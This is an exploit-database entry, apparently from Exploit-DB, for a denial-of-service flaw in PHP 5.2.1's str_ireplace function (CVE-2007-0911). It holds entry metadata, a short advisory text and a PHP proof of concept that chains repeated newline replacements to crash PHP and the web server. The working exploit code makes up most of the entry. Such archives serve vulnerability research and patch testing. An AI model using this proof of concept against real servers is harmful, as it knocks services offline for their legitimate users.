EXPLOITS

PHP 5.2.1 - STR_IReplace Remote Denial of Service

Author: Thomas Hruska
type: dos
platform: php
port: 
date_added: 2007-02-09  
date_updated: 2013-11-14  
verified: 1  
codes: CVE-2007-0911;OSVDB-33952  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 29577.php  

source: https://www.securityfocus.com/bid/22505/info

PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.

An attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.

This issue affects PHP 5.2.1; other versions may also be vulnerable.

<?
   $Data = "Change tracking and management software designed to watch
for abnormal system behavior.\nSuggest features, report bugs, or ask
questions here.";
   $Data = str_ireplace("\r\n", "<br>", $Data);
   $Data = str_ireplace("\n", "<br>", $Data);
   $Data = str_ireplace("\r\n", "<br>", $Data);
   $Data = str_ireplace("\n", "<br>", $Data);
   $Data = str_ireplace("\r\n", "<br>", $Data);
   $Data = str_ireplace("\n", "<br>", $Data);
   $Data = str_ireplace("\r\n", "<br>", $Data);
   $Data = str_ireplace("\n", "<br>", $Data);
   $Data = str_ireplace("\r\n", "<br>", $Data);
   $Data = str_ireplace("\n", "<br>", $Data);
   $Data = str_ireplace("\r\n", "<br>", $Data);
   $Data = str_ireplace("\n", "<br>", $Data);
   $Data = str_ireplace("\r\n", "<br>", $Data);
   $Data = str_ireplace("\n", "<br>", $Data);
?>